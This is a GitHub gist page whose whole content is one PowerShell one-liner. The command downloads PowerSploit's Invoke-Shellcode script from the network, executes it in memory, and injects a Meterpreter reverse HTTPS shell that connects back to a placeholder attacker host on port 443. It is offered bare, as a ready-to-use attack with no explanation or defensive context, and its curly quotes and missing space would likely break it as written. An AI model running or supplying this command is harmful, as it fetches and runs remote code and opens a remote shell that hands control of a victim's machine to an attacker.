Skip to content

Instantly share code, notes, and snippets.

@SunnyHoi
Created January 8, 2018 04:18
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save SunnyHoi/169f01c57cc19ba2d6c47b146c97a197 to your computer and use it in GitHub Desktop.
Save SunnyHoi/169f01c57cc19ba2d6c47b146c97a197 to your computer and use it in GitHub Desktop.
powershell.exe “IEX (New-ObjectNet.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost x.x.x.x -Lport 443 -Force”
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment